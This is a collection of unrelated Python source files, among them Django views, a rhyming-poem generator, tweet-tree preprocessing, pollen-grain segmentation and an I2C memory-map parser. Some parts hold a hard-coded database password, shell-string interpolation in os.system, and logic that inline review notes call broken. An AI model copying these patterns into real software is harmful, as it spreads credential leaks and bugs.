    listaCSV.append( '"' + nombre.replace("\"","") +'","'+ descri.replace("\"","") +'","'+ tel.replace("\"","") +'","'+ dire.replace("\"","") +'","'+ website.replace("\"","") +'","'+ email.replace("\"","") +'","'+ cuisines.replace("\"","") +'","'+ horaComp.replace("\"","") +'","'+ features.replace("\"","") +'","'+ meals.replace("\"","") +'","'+ goodFor.replace("\"","") +'","'+ url.replace("\"","") + '"')
    # Flush a numbered CSV after every 50 rows.
    # NOTE(review): listaCSV is never cleared, so each flush rewrites every
    # row scraped so far, not just the newest 50 -- confirm intent.
    if (iterar==50):
        archi = archi + 1;
        iterar = 0;
        createFileCSV('file' + str(archi));
# Final flush for the remaining rows (reuses the last file number).
createFileCSV('file' + str(archi));
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect
from django.views.generic.list import ListView
from form import RegistroForms, ChequeoForms
from models import Becarios, Registro
import datetime
# Create your views here.
def base(request):
    # Render the static base template.
    return render(request,'apps/Base.html')
def Registro_view(request):
    # Registration form: on a valid POST, save and redirect
    # (Post/Redirect/Get); otherwise render an empty form.
    if request.method == 'POST':
        form = RegistroForms(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Registrar_view')
    else:
        form = RegistroForms()
    return render(request,'apps/Registro.html',{'form':form})
def Chequeo_view(request):
    # Meal check-in view: a superuser submits a student control number and,
    # if the student exists, a Registro row is saved for today.
    form = ChequeoForms(request.POST or None)
    mensaje=""
    verificar = False
    verificar2 = False  # NOTE(review): never used
    alumno = Becarios.objects.all()
    fecha = Registro.objects.all()
    f = Registro(FecReg=datetime.datetime.now())  # NOTE(review): never used/saved
    print (form.is_valid())
    if form.is_valid():
        print (request.user.is_superuser)
        if request.user.is_superuser:
            nocontrol1 = form.cleaned_data["nocontrol"]
            for alumn in alumno:
                print (nocontrol1 == alumn.Nocontrol)
                if nocontrol1 == alumn.Nocontrol:
                    verificar=True
                    p = Registro(nocontrol=alumn,FecReg=datetime.datetime.now())
                    for fec in fecha:
                        # NOTE(review): this compares a control number with
                        # FechaReg (a date-like field?), so a duplicate
                        # check-in is unlikely to ever be detected, and
                        # p.save() runs once per existing Registro row --
                        # confirm the intended duplicate-day logic.
                        if nocontrol1 != fec.FechaReg:
                            p.save()
                        if nocontrol1 == fec.FechaReg:
                            mensaje="Ya checaste el dia de hoy"
                    # NOTE(review): unconditionally overwrites the message
                    # set just above.
                    mensaje="Comida Registrada"
    if verificar == False:
        mensaje="Alumno no registrado en el sistema"
    form=ChequeoForms()
    return render(request,'apps/Chequeo.html',{"form":form,"Mensaje":mensaje})
#def Mostrar_view(request):
class Becarios_report(ListView):
    # Plain ListView over all Becarios records, rendered by the report template.
    template_name = "apps/Becarios_report.html"
    model = Becarios
'''
class Becarios_report(ListView):
template_name = "apps/becarios_report.html"
model= Becarios'''
|
"""
Jiun Kim
M6 Poetry Slam
This is Poetry Maker Punchline King made by Jiun Kim.
The libraries used are pyrhyme which makes rhyme words and word files from the internet.
"""
from random import randint, randrange
import pyrhyme
class RandomWordGenerator:
    """
    Makes random nouns, verbs, adjectives, adverbs and subjects, loaded
    from the prepared per-syllable word files, and creates rhymes for a
    given word via pyrhyme.
    """
    def __init__(self):
        self.nouns = {}
        self.verbs = {}
        self.adjectives = {}
        self.adverbs = {}
        self.subjects = ["I", "He", "She", "They", "We", "You"]
        self.rhymer = pyrhyme.RhymeBrain()
        for i in range(1, 5):
            # Load the word lists, keyed by syllable count (1-4).  The
            # context managers guarantee the files are closed on error.
            with open(f"adjectives/{i}syllableadjectives.txt", "r") as f:
                self.adjectives[i] = f.read().split()
            with open(f"adverbs/{i}syllableadverbs.txt", "r") as f:
                self.adverbs[i] = f.read().split()
            with open(f"nouns/{i}syllablenouns.txt", "r") as f:
                self.nouns[i] = f.read().split()
            with open(f"verbs/{i}syllableverbs.txt", "r") as f:
                self.verbs[i] = f.read().split()

    def make_rhyme(self, word):
        """
        Uses the rhyming library to pick the first (best) rhyme for *word*.
        Falls back to the original word when no rhyme exists.
        """
        rhymes = [x.word for x in self.rhymer.rhyming(word, lang='en')]
        if len(rhymes) == 0:
            # Edge case: there might be no rhymes; return the word itself.
            return word
        else:
            return rhymes[0]

    def generate_word(self, word):
        """
        Generate a random word given the type of the word
        ("Noun", "Adjective", "Adverb", "Verb" or "Subject").
        """
        if word == "Noun":
            return self.random_noun()
        elif word == "Adjective":
            return self.random_adjective()
        elif word == "Adverb":
            return self.random_adverb()
        elif word == "Verb":
            return self.random_verb()
        elif word == "Subject":
            result = self.random_subject()
            return result

    def _pick(self, table):
        """Pick a uniformly random word from a random syllable bucket.

        Bug fix: the old randrange(0, len(words) - 1) could never select
        the last word of a bucket and raised ValueError on single-word
        buckets; randrange(len(words)) covers every index.
        """
        words = table[randint(1, 4)]
        return words[randrange(len(words))]

    def random_subject(self):
        # Index over the whole subject list instead of a hard-coded 0..5.
        return self.subjects[randrange(len(self.subjects))]

    def random_verb(self):
        return self._pick(self.verbs)

    def random_adjective(self):
        return self._pick(self.adjectives)

    def random_adverb(self):
        return self._pick(self.adverbs)

    def random_noun(self):
        return self._pick(self.nouns)
class RandomSentenceGenerator:
    """
    Builds pairs of lines from randomly generated words, where the second
    line rhymes with the first at one randomly chosen word position.
    """
    def __init__(self):
        self.word_generator = RandomWordGenerator()
        # Basic sentence skeletons that give each line a grammatical shape.
        self.sentence_structures = {
            0: ["Subject", "Verb"],
            1: ["Subject", "Verb", "Noun"],
            2: ["Subject", "Verb", "Adjective"],
            3: ["Subject", "Verb", "Adverb"],
            4: ["Noun", "Verb", "Noun"],
        }

    def generate_sentence(self):
        """
        Create a pair of sentences; the second carries a word that rhymes
        with the word at the same position in the first.
        """
        structure = self.sentence_structures[randint(0, 4)]
        rhyme_at = randint(0, len(structure) - 1)  # position forced to rhyme
        first_words = []
        second_words = []
        for position, part in enumerate(structure):
            word_a = self.word_generator.generate_word(part)
            word_b = self.word_generator.generate_word(part)
            if position == rhyme_at:
                word_b = self.word_generator.make_rhyme(word_a)
            first_words.append(word_a)
            second_words.append(word_b)
        first_line = "".join(w + " " for w in first_words)
        second_line = "".join(w + " " for w in second_words)
        return first_line + "\n" + second_line
class Evaluator:
    """
    Evaluate a poem.
    """
    def __init__(self):
        # Running record of every first letter ever seen; kept for
        # backward compatibility with code that inspects it.
        self.alphabets = []

    def evaluate(self, poem):
        """
        Score *poem* by word diversity: the number of distinct first
        letters among the poem's words.

        Bug fix: the score is now computed from this poem alone.  The old
        implementation accumulated letters in self.alphabets across
        calls, so every evaluation after the first was inflated by
        earlier poems.
        """
        first_letters = {word[0] for word in poem.split()}
        self.alphabets.extend(first_letters)
        return len(first_letters)
sentence_generator = RandomSentenceGenerator()
evaluator = Evaluator()
poem = ""
# Build the poem out of four rhyming couplets, blank line between them.
for i in range(1, 5):
    sentence = sentence_generator.generate_sentence()
    poem += sentence + "\n\n"
result = str(evaluator.evaluate(poem))
# Title is just one more random noun.
title = sentence_generator.word_generator.generate_word("Noun")
print(f"\nTitle: {title} \n\n")
print(poem)
print("The score is ", result)
import os
# Read the poem and its score aloud (macOS-only 'say' command).
# NOTE(review): interpolating the poem into a shell string is fragile if a
# word ever contains a quote -- consider subprocess.run with an arg list.
os.system(f"say -v Alex '{poem}'")
os.system(f"say -v Alex 'The score is {result}'")
import matplotlib.pyplot as plt
# input_values=[1,2,3,4,5]
# squares=[1,4,9,16,25]
# plt.plot(input_values,squares,linewidth=3)
# plt.title("Square Numbers",fontsize=18)
# plt.xlabel("Value",fontsize=15)
# plt.ylabel("Square of Value",fontsize=15)
# plt.tick_params(axis='both',labelsize=15)
#
# # plt.show()
#
# x_values=list(range(1,100))
# y_values=[x**2 for x in x_values]
# plt.scatter(x_values,y_values,c='green',edgecolors=None,s=40)
# plt.title("Square numbers",fontsize=22)
# plt.xlabel("value",fontsize=12)
# plt.ylabel("square value",fontsize=11)
#
# plt.tick_params(axis='both',which='major',labelsize=5)
# plt.savefig('squart_plot.png',bbox_inches='tight')
# plt.axis([0,100,0,10000])
# plt.show()
from random import choice
class RandomWalk():
    """Generate the points of a two-dimensional random walk."""

    def __init__(self, num_points=5000):
        self.num_points = num_points
        # Every walk starts at the origin.
        self.x_values = [0]
        self.y_values = [0]

    def fill_walk(self):
        """Append steps until the walk holds num_points points."""
        while len(self.x_values) < self.num_points:
            dx = self.get_step()
            dy = self.get_step()
            # Discard null moves; a step must actually go somewhere.
            if dx == 0 and dy == 0:
                continue
            self.x_values.append(self.x_values[-1] + dx)
            self.y_values.append(self.y_values[-1] + dy)

    def get_step(self):
        """Return a random signed step length in [-4, 4]."""
        direction = choice([1, -1])
        distance = choice([0, 1, 2, 3, 4])
        return direction * distance
|
import numpy as np
import csv
def transformToRNN(filename = 'tweeti.b.dist.parsed'):
    """Convert a tab-separated parsed-tweet file into RNN tree format.

    Each input row holds (id, id, label, parse).  The sentiment label is
    mapped to an integer class {0: negative, 1: neutral, 2: positive} and
    substituted for the root label of the parse tree; one tree is written
    per output line, into the trees/ file matching the input split.
    """
    outfile = 'trees/temp.txt'
    if filename == 'data/b.train.preprocessed.utf8.parsed':
        outfile = 'trees/train.txt'
    elif filename == 'data/b.dev.preprocessed.utf8.parsed':
        outfile = 'trees/dev.txt'
    elif filename == 'data/b.test.parsed':
        outfile = 'trees/test.txt'
    # Map textual labels (with or without stray trailing quotes) to classes.
    labelMap = {"neutral":1,"positive":2,"negative":0,"objective":1,"objective-OR-neutral":1,
                "neutral\"\"":1,"positive\"\"":2,"negative\"\"":0,"objective\"\"":1,"objective-OR-neutral\"\"":1}
    # 'with' closes BOTH files; the old code never closed the input file
    # and relied on an explicit close for the writer.
    with open(filename) as infile, open(outfile, 'w') as writer:
        reader = csv.reader(infile, delimiter="\t")
        for line in reader:
            # Drop the column's fixed 6-char prefix and trailing char to
            # expose the bare parse tree -- presumably a wrapper like
            # "tree=(...)"; confirm against the parser output format.
            treeString = line[3][6:-1]
            index = treeString.index(' ')
            # Replace the root label with the integer sentiment class.
            writer.write("(" + str(labelMap[line[2]]) + treeString[index:] + '\n')
def seperateTrainDev():
    """Randomly split data/tweeti.b.dist into train (80%) and dev (20%)
    line files, recording the chosen dev line indices in data/dev_indices."""
    total = 6092    # number of lines in the distribution file
    percent = 0.2   # fraction of lines held out for dev
    # np.random.choice requires an integer size; the old float argument
    # (percent * total) raises a TypeError on modern NumPy.
    devIndices = set(np.random.choice(total, size=int(percent * total),
                                      replace=False))
    with open('data/dev_indices', 'w') as indicesWriter:
        indicesWriter.write(str(devIndices))
    filename = 'data/tweeti.b.dist'
    # Single pass over the source file, routing each line by its index.
    with open(filename) as reader, \
         open('data/b.train', 'w') as trainWriter, \
         open('data/b.dev', 'w') as devWriter:
        for i, line in enumerate(reader):
            if i in devIndices:
                devWriter.write(line)
            else:
                trainWriter.write(line)
# Regenerate the RNN-format tree files for the dev and train splits.
transformToRNN(filename = 'data/b.dev.preprocessed.utf8.parsed')
transformToRNN(filename = 'data/b.train.preprocessed.utf8.parsed')
|
# Connection settings for the demo PostgreSQL database.
user = "postgres"
host = "172.22.240.1"
port = "5432"
db_model_name = "demo"
# NOTE(review): hard-coded credentials in source control -- consider
# loading the password from an environment variable or secrets store.
db_model_pswd = "1234"
"""Segment pollen tubes."""
import os
import argparse
import warnings
import math
import logging
import numpy as np
import scipy.ndimage
from skimage.morphology import disk
import skimage.feature
from jicbioimage.core.image import Image
from jicbioimage.core.transform import transformation
from jicbioimage.core.util.color import pretty_color
from jicbioimage.core.io import AutoWrite, AutoName
from jicbioimage.transform import (
mean_intensity_projection,
# threshold_otsu,
dilate_binary,
erode_binary,
remove_small_objects,
invert,
)
from jicbioimage.segment import connected_components, watershed_with_seeds
from jicbioimage.illustrate import AnnotatedImage
__version__ = "0.5.0"
# Suppress spurious scikit-image warnings.
# warnings.filterwarnings("ignore", module="skimage.exposure._adapthist")
# warnings.filterwarnings("ignore", module="skimage.util.dtype")
warnings.filterwarnings("ignore", module="skimage.io._io")
# Setup logging with a stream handler.
logger = logging.getLogger(os.path.basename(__file__))
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
logger.addHandler(ch)
# Prefix intermediate debug images with a 3-digit step number.
AutoName.prefix_format = "{:03d}_"
def form_factor(prop):
    """Return the form factor circularity measure: 4*pi*area / perimeter^2
    (1.0 for a perfect circle, smaller for less circular regions)."""
    perimeter_squared = float(prop.perimeter) ** 2
    return 4 * math.pi * prop.area / perimeter_squared
def centroid(region):
    """Return the (y, x) centroid coordinates of *region* as integers."""
    return tuple(int(np.mean(axis)) for axis in region.index_arrays)
@transformation
def threshold_median(image, scale=0):
    """Return a binary mask of pixels brighter than scale * median(image)."""
    cutoff = np.median(image) * scale
    return image > cutoff
@transformation
def remove_large_segments(segmentation, max_size):
    """Remove regions larger than *max_size* by zeroing them out."""
    for identifier in segmentation.identifiers:
        candidate = segmentation.region_by_identifier(identifier)
        if candidate.area <= max_size:
            continue
        segmentation[candidate] = 0
    return segmentation
@transformation
def remove_small_segments(segmentation, min_size):
    """Remove regions smaller than *min_size* by zeroing them out."""
    for identifier in segmentation.identifiers:
        candidate = segmentation.region_by_identifier(identifier)
        if candidate.area >= min_size:
            continue
        segmentation[candidate] = 0
    return segmentation
@transformation
def fill_holes(image, min_size):
    """Return image with holes smaller than *min_size* filled in."""
    # Temporarily disable jicbioimage's automatic intermediate-image
    # writing while performing the invert/remove/invert trick, then
    # restore the previous setting.
    tmp_autowrite_on = AutoWrite.on
    AutoWrite.on = False
    # A hole in the foreground is a small object in the inverted image.
    image = invert(image)
    image = remove_small_objects(image, min_size=min_size)
    image = invert(image)
    AutoWrite.on = tmp_autowrite_on
    return image
@transformation
def distance(image):
    """Return the exact Euclidean distance transform of *image*."""
    edt = scipy.ndimage.distance_transform_edt
    return edt(image)
@transformation
def local_maxima(image, footprint=None, labels=None):
    """Return a boolean mask marking the local maxima of *image*."""
    return skimage.feature.peak_local_max(
        image, indices=False, footprint=footprint, labels=labels)
def fpath2name(fpath):
    """Return 'test' from a path such as /tmp/test.txt.

    Bug fix: the old ``name, suffix = bname.split(".")`` raised
    ValueError whenever the basename contained more or fewer than one
    dot (e.g. "a.b.txt" or "README").  os.path.splitext strips only the
    final extension and handles both cases.
    """
    bname = os.path.basename(fpath)
    name, _suffix = os.path.splitext(bname)
    return name
def find_grains(input_file, output_dir=None):
    """Return a segmentation of the grains in *input_file*.

    NOTE(review): the previous docstring promised a
    (grains, difficult_regions) tuple, but only a single segmentation is
    returned.
    """
    # NOTE(review): *name* is computed but never used afterwards -- the
    # output path appears to be handled by the AutoName/AutoWrite
    # machinery instead; confirm before removing.
    name = fpath2name(input_file)
    name = "grains-" + name + ".png"
    if output_dir:
        name = os.path.join(output_dir, name)
    image = Image.from_file(input_file)
    intensity = mean_intensity_projection(image)
    # Median filter seems more robust than Otsu.
    # image = threshold_otsu(intensity)
    image = threshold_median(intensity, scale=0.8)
    image = invert(image)
    # Morphological opening (erode then dilate) to smooth the mask edges.
    image = erode_binary(image, selem=disk(2))
    image = dilate_binary(image, selem=disk(2))
    image = remove_small_objects(image, min_size=200)
    image = fill_holes(image, min_size=50)
    # Watershed on the distance transform, seeded at its local maxima.
    dist = distance(image)
    seeds = local_maxima(dist)
    seeds = dilate_binary(seeds)  # Merge spurious double peaks.
    seeds = connected_components(seeds, background=0)
    segmentation = watershed_with_seeds(dist, seeds=seeds, mask=image)
    # Remove spurious blobs.
    segmentation = remove_large_segments(segmentation, max_size=3000)
    segmentation = remove_small_segments(segmentation, min_size=100)
    return segmentation
def annotate(input_file, output_dir):
    """Write an annotated image to disk.

    Segments the grains, estimates how many grains each segmented region
    represents (relative to the median region area), draws outlines and
    counts onto a PNG and writes a one-line CSV.  Returns
    (png_name, num_grains).
    """
    logger.info("---")
    logger.info('Input image: "{}"'.format(os.path.abspath(input_file)))
    image = Image.from_file(input_file)
    intensity = mean_intensity_projection(image)
    name = fpath2name(input_file)
    png_name = name + ".png"
    csv_name = name + ".csv"
    png_path = os.path.join(output_dir, png_name)
    csv_path = os.path.join(output_dir, csv_name)
    grains = find_grains(input_file, output_dir)
    ann = AnnotatedImage.from_grayscale(intensity)
    # Determine the median grain size based on the segmented regions.
    areas = []
    for i in grains.identifiers:
        region = grains.region_by_identifier(i)
        areas.append(region.area)
    median_grain_size = np.median(areas)
    num_grains = 0
    for i in grains.identifiers:
        region = grains.region_by_identifier(i)
        color = pretty_color(i)
        # A region that merged several grains counts as several, judged
        # by its area relative to the median grain; rounding to zero
        # discards the region entirely.
        num_grains_in_area = region.area / median_grain_size
        num_grains_in_area = int(round(num_grains_in_area))
        if num_grains_in_area == 0:
            continue
        # Draw a one-pixel outline just inside the region border.
        outer_line = region.dilate().border
        outline = region.border.dilate() * np.logical_not(outer_line)
        ann.mask_region(outline, color=color)
        ann.text_at(str(num_grains_in_area), region.centroid,
                    color=(255, 255, 255))
        num_grains = num_grains + num_grains_in_area
    ann.text_at("Num grains: {:3d}".format(num_grains), (10, 10),
                antialias=True, color=(0, 255, 0), size=48)
    logger.info("Num grains: {:3d}".format(num_grains))
    logger.info('Output image: "{}"'.format(os.path.abspath(png_path)))
    with open(png_path, "wb") as fh:
        fh.write(ann.png())
    logger.info('Output csv: "{}"'.format(os.path.abspath(csv_path)))
    with open(csv_path, "w") as fh:
        fh.write("{},{}\n".format(png_name, num_grains))
    return png_name, num_grains
def analyse_all(input_dir, output_dir):
    """Annotate every JPEG in *input_dir* and write a summary CSV."""
    summary_name = "summary.csv"
    summary_name = os.path.join(output_dir, summary_name)
    logger.info('Summary csv: "{}"'.format(os.path.abspath(summary_name)))
    with open(summary_name, "w") as fh:
        fh.write("img,grains\n")
        for fname in os.listdir(input_dir):
            lowered = fname.lower()
            # Only JPEG images are processed; the embedded Leica logo
            # image is skipped.
            if not lowered.endswith("jpg") or lowered.startswith("leicalogo"):
                continue
            fpath = os.path.join(input_dir, fname)
            png_name, num_grains = annotate(fpath, output_dir)
            fh.write("{},{}\n".format(png_name, num_grains))
def main():
    """Parse arguments and analyse a single image or a directory of them."""
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("input", help="Input file/directory")
    parser.add_argument("output_dir", help="Output directory")
    parser.add_argument("--debug", default=False, action="store_true",
                        help="Write out intermediate images")
    args = parser.parse_args()
    if not os.path.isdir(args.output_dir):
        os.mkdir(args.output_dir)
    AutoName.directory = args.output_dir
    # Create file handle logger.  Single-file runs get a per-image log
    # name; directory runs share a plain "log" file.
    log_filename = "log"
    if os.path.isfile(args.input):
        log_filename = fpath2name(args.input) + ".log"
    fh = logging.FileHandler(os.path.join(args.output_dir, log_filename),
                             mode="w")
    fh.setLevel(logging.DEBUG)
    format_ = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
    formatter = logging.Formatter(format_)
    fh.setFormatter(formatter)
    logger.addHandler(fh)
    logger.info("Script name: {}".format(__file__))
    logger.info("Script version: {}".format(__version__))
    # Only write out intermediate images in debug mode.
    if not args.debug:
        AutoWrite.on = False
    if os.path.isfile(args.input):
        annotate(args.input, args.output_dir)
    elif os.path.isdir(args.input):
        analyse_all(args.input, args.output_dir)
    else:
        parser.error("{} not a file or directory".format(args.input))
if __name__ == "__main__":
    main()
|
'''
*******************************************************************************
Desc : A script used to parse/access Internal MemoryMap.
Note : N/A
History : 2010/07/15 Panda.Xiong Create
*******************************************************************************
'''
from ctypes import *
import sys
import string
import os
import xlrd
import i2c
class _AddrInfo:
'used to store parsed address information'
def __init__(self, mem_addr=0, mem_page_id=0, mem_offset=0, mem_len=0, mem_bit=0):
self.mem_addr = mem_addr
self.mem_page_id = mem_page_id # -1 means DIRECT Page
self.mem_offset = mem_offset
self.mem_len = mem_len # if mem_bit == -1, this means Byte(s) length; else, means bit length.
self.mem_bit = mem_bit # -1 means Byte(s)
class MemoryMap:
    '''Parses the "Internal Memory Map" sheet of an Excel workbook and
    exposes CONFIG_GET/CONFIG_SET accessors that read and write the mapped
    memories over I2C.  (Python 2 code: print statements, string.atoi.)'''

    def _assert(self, message):
        'Fatal-error helper: report the message and terminate the process.'
        print 'Error: ' + message
        sys.exit(-1)

    def __init__(self, filename=None, debug_enable=False):
        # check input filename
        if filename == None:
            self._assert('Incorrect filename!')
        self.filename = filename
        self.debug_enable = debug_enable
        # create an empty dictionary: memory name -> [_AddrInfo, description]
        self.memtable = {}
        if self.debug_enable:
            self.logname = r"~test.log"
            self.log = file(self.logname, 'w')
        # load I2C Library
        self.i2c = i2c.I2C()
        # open Internal MemoryMap
        self._open()

    def _parse_address(self, s_addr):
        'parse address string'
        # Accepted hex-digit forms:
        #   AA.OO         one byte at offset OO on the DIRECT page
        #   AA[PP].OO-QQ  byte range on extended page PP
        #   AA.OO.B[-C]   bit (range) within the byte at offset OO
        valid_addr_string_table = ['0','1','2','3','4','5','6','7','8','9',
                                   'A','B','C','D','E','F',
                                   '[',']','.','-']
        # check the input address string is valid or not
        for i in range(len(s_addr)):
            if not s_addr[i] in valid_addr_string_table:
                self._assert('Invalid Address(1): %s' % s_addr)
        addr_info = _AddrInfo()
        # split input address string
        ss_parse = s_addr.split('.')
        # get memory address & page id
        if (len(ss_parse) != 2) and (len(ss_parse) != 3):
            self._assert('Invalid Address(2): %s' % s_addr)
        if ss_parse[0].find('[') == -1:
            # DIRECT Page
            addr_info.mem_addr = string.atoi(ss_parse[0], 16)
            addr_info.mem_page_id = -1
        else:
            # Extended Page
            dev_end_index = ss_parse[0].index('[')
            page_end_index = ss_parse[0].index(']')
            addr_info.mem_addr = string.atoi(ss_parse[0][0:dev_end_index], 16)
            addr_info.mem_page_id = string.atoi(ss_parse[0][dev_end_index+1:page_end_index], 16)
        # get memory offset & length
        if ss_parse[1].find('-') == -1:
            # memory length is 1 Byte
            addr_info.mem_offset = string.atoi(ss_parse[1], 16)
            addr_info.mem_len = 1
        else:
            # memory length is over 1 Byte
            if len(ss_parse) == 3:
                # a byte range cannot also carry a bit suffix
                self._assert('Invalid Address(3): %s' % s_addr)
            ss_offset = ss_parse[1].split('-')
            addr_info.mem_offset = string.atoi(ss_offset[0], 16)
            addr_info.mem_len = string.atoi(ss_offset[1], 16) - addr_info.mem_offset + 1
        # get memory bit
        if len(ss_parse) == 2:
            # memory is Byte(s)
            addr_info.mem_bit = -1
        else:
            # memory is bit
            ss_bit = ss_parse[2].split('-')
            addr_info.mem_bit = string.atoi(ss_bit[0], 16)
            if len(ss_bit) == 1:
                addr_info.mem_len = 1
            else:
                # NOTE(review): length of a bit range "a-b" is computed as
                # b - a, not b - a + 1 -- confirm against the sheet format.
                addr_info.mem_len = string.atoi(ss_bit[1], 16) - addr_info.mem_bit
            if addr_info.mem_len > 8:
                self._assert('Invalid Address(4): %s' % s_addr)
        return addr_info

    def _record(self, row_key, row_data):
        'record Memory Map'
        # check this memory is recorded or not
        if row_key in self.memtable:
            self._assert('Duplicate Memory definition: "%s"' % row_key)
        # parse address & record this memory
        mem_info = []
        addr_info = self._parse_address(row_data[0].upper())
        mem_info.append(addr_info)
        mem_info.append(row_data[2])    # memory description
        self.memtable[row_key] = mem_info
        if self.debug_enable:
            # debug record log
            s_addr = 'addr:%02X, page_id:%02X, offset:%02X, len:%02X, bit:%-2X' % \
                     (addr_info.mem_addr,
                      addr_info.mem_page_id,
                      addr_info.mem_offset,
                      addr_info.mem_len,
                      addr_info.mem_bit)
            self.log.write('%-35s : %-50s %s\n' % (row_key, s_addr, row_data[2]))

    def _open(self):
        'Load every memory definition row from the workbook into memtable.'
        # open excel file
        try:
            self.xlBook = xlrd.open_workbook(self.filename)
            self.sheet = self.xlBook.sheet_by_name('Internal Memory Map')
        except:
            self._assert('Open Excel File "%s" Fail!' % self.filename)
        # launch all memory definitions
        for row in range(1, self.sheet.nrows):
            # read memory data
            mem_data = self.sheet.row_values(row)
            mem_name = mem_data[0].strip()
            # have reached to the end of excel file, exit
            if mem_name == 'END':
                break
            # if this memory is not empty, record it
            if mem_name:
                self._record(mem_name, mem_data[1:])

    def CONFIG_SET(self, mem_name, mem_value):
        'Write a string or integer value to the named memory over I2C.'
        if not mem_name in self.memtable:
            self._assert('Memory "%s" is not found in MemoryMap!' % mem_name)
        addr_info = self.memtable[mem_name][0]
        # create write buffer
        write_buf = []
        if type(mem_value) == type('abcd'):     # string type
            if addr_info.mem_bit != -1:
                # bit memory
                self._assert('Do not know how to write string to bit Memory "%s"!' % mem_name)
            if len(mem_value) != addr_info.mem_len:
                self._assert('The length of Memory "%s" doesnot match input string "%s"!' % (mem_name, mem_value))
            for i in range(addr_info.mem_len):
                write_buf.append(ord(mem_value[i]))
        elif type(mem_value) == type(0x12345678):   # integer type
            if addr_info.mem_bit != -1:
                # bit memory
                if mem_value >= 0xFF:
                    self._assert('A bit Memory "%s" can only be within 1 byte!' % mem_name)
                if (mem_value & (0xFF << addr_info.mem_len)) != 0:
                    # NOTE(review): this format string has two conversion
                    # specifiers (%s and %X) but only mem_name is supplied,
                    # so hitting this path raises TypeError instead of the
                    # intended error message.
                    self._assert('Input Memory Data too long for bit Memory "%s"! %X' % mem_name)
            else:
                # Byte(s) memory
                if (mem_value >> addr_info.mem_len*8) != 0:
                    self._assert('Input Memory "%s" data "0x%X" length too long!' % (mem_name, mem_value))
            # serialise the integer big-endian into mem_len bytes
            for i in range(addr_info.mem_len):
                tmp_value = (mem_value>>((addr_info.mem_len-i-1)*8)) & 0xFF
                write_buf.append(tmp_value)
        # select page: register 0x7F holds the currently selected page id
        if addr_info.mem_page_id != -1:
            (vResult, aBuf) = self.i2c.RandomRead(addr_info.mem_addr, 0x7F, 1)
            if vResult:
                if aBuf[0] != addr_info.mem_page_id:
                    aBuf[0] = addr_info.mem_page_id
                    if not self.i2c.RandomWrite(addr_info.mem_addr, 0x7F, aBuf):
                        self._assert('Change Page ID to 0x%02X Fail!' % addr_info.mem_page_id)
            else:
                self._assert('Read Current Selected Page ID Fail!')
        # write memory
        if addr_info.mem_bit == -1:
            # Byte(s) Memory
            if not self.i2c.RandomWrite(addr_info.mem_addr, addr_info.mem_offset, write_buf):
                self._assert('Write Memory "%s" Fail!' % mem_name)
        else:
            # bit memory: read-modify-write the containing byte
            # read byte memory, which contains this bit memory
            (vResult, aBuf) = self.i2c.RandomRead(addr_info.mem_addr, addr_info.mem_offset, 1)
            if not vResult:
                self._assert('Read bit Memory "%s" Fail!' % mem_name)
            # modify memory
            vMask = (~(0xFF << addr_info.mem_len) & 0xFF) << addr_info.mem_bit  # mask for bit memory
            aBuf[0] &= ~vMask
            aBuf[0] |= ((write_buf[0] << addr_info.mem_bit) & vMask)
            # write the modified memory
            if not self.i2c.RandomWrite(addr_info.mem_addr, addr_info.mem_offset, aBuf):
                self._assert('Write bit Memory "%s" Fail!' % mem_name)

    def CONFIG_GET(self, mem_name):
        'Read the named memory over I2C; returns an int for single-byte or bit memories, a byte list otherwise.'
        if not mem_name in self.memtable:
            self._assert('Memory "%s" is not found in MemoryMap!' % mem_name)
        addr_info = self.memtable[mem_name][0]
        # select page: register 0x7F holds the currently selected page id
        if addr_info.mem_page_id != -1:
            (vResult, aBuf) = self.i2c.RandomRead(addr_info.mem_addr, 0x7F, 1)
            if vResult:
                if aBuf[0] != addr_info.mem_page_id:
                    aBuf[0] = addr_info.mem_page_id
                    if not self.i2c.RandomWrite(addr_info.mem_addr, 0x7F, aBuf):
                        self._assert('Change Page ID to 0x%02X Fail!' % addr_info.mem_page_id)
            else:
                self._assert('Read Current Selected Page ID Fail!')
        # read memory
        if addr_info.mem_bit == -1:
            # Byte(s) Memory
            (vResult, aReadBuf) = self.i2c.RandomRead(addr_info.mem_addr, addr_info.mem_offset, addr_info.mem_len)
            if vResult:
                if addr_info.mem_len == 1:
                    return aReadBuf[0]
                else:
                    return aReadBuf
            else:
                self._assert('Read Memory "%s" Fail!' % mem_name)
        else:
            # bit memory
            # read byte memory, which contains this bit memory
            (vResult, aBuf) = self.i2c.RandomRead(addr_info.mem_addr, addr_info.mem_offset, 1)
            if not vResult:
                self._assert('Read bit Memory "%s" Fail!' % mem_name)
            # get & return bit memory value
            vMask = (~(0xFF << addr_info.mem_len) & 0xFF) << addr_info.mem_bit  # mask for bit memory
            aBuf[0] &= vMask
            return (aBuf[0] >> addr_info.mem_bit)
'auto-test scripts'
if __name__ == '__main__':
    # Smoke test against real hardware: exercises multi-byte, bit and
    # single-byte memories.  Requires the workbook and an I2C adapter.
    print ' ---- Start Testing ---- '
    map = MemoryMap(r'../1620-00100-00_InternalMemoryMap.xls', True)
    print ' ---- Load MemoryMap Done ---- '
    map.CONFIG_SET('PWD_Entry', 0x7E755D4F)
    print ' -> Get "PWD_Entry" memory:',
    aReadBuf = map.CONFIG_GET('PWD_Entry')
    for i in range(len(aReadBuf)):
        print '%02X' % aReadBuf[i],
    print
    map.CONFIG_SET('RT_SW_TXDIS', 1)
    print ' -> Get "RT_SW_TXDIS" bit memory: %X' % map.CONFIG_GET('RT_SW_TXDIS')
    map.CONFIG_SET('Debug_System_Ctrl_Polling_Dis', 1)
    print ' -> Get "Debug_System_Ctrl_Polling_Dis" bit memory: %X' % map.CONFIG_GET('Debug_System_Ctrl_Polling_Dis')
    map.CONFIG_SET('Page_Select', 0x81)
    print ' -> Get "Page_Select" memory: %02X' % map.CONFIG_GET('Page_Select')
    map.CONFIG_SET('Debug_Cmd_Param1', 0xABCD)
    print ' -> Get "Debug_Cmd_Param1" memory:',
    aReadBuf = map.CONFIG_GET('Debug_Cmd_Param1')
    for i in range(len(aReadBuf)):
        print '%02X' % aReadBuf[i],
    print
    print ' ---- Test Done ---- '
|
import csv, sys
import boto3
# Column headers expected in the billing CSV; column_index maps each to
# its resolved position once the header row is found.
